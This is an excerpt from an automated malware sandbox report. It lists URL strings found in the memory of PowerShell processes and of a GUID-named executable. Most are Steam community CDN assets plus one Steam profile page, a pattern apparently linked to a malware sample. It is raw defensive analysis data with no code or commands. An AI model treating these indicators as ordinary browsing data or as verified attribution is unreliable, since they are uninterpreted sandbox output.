Source: powershell.exe, 00000003.00000002.1567151650.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567151650.00000000043F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1555257254.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1619557449.0000000004848000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.0000000005151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1695247796.00000000046B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.P
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: https://community.cloudflare.
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: https://community.cloudflare.steamsta
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=LjouqOsWbS
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&l=english&am
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=l1VAyDrxeeyo&l=en
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748291843.0000000000193000.00000004.00000010.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=_92T
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=3W_ge11SZngF&l=englis
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=XfYrwi9zUC4b&l=
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engli
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=engli
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=iGFW_JMULCcZ&
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l
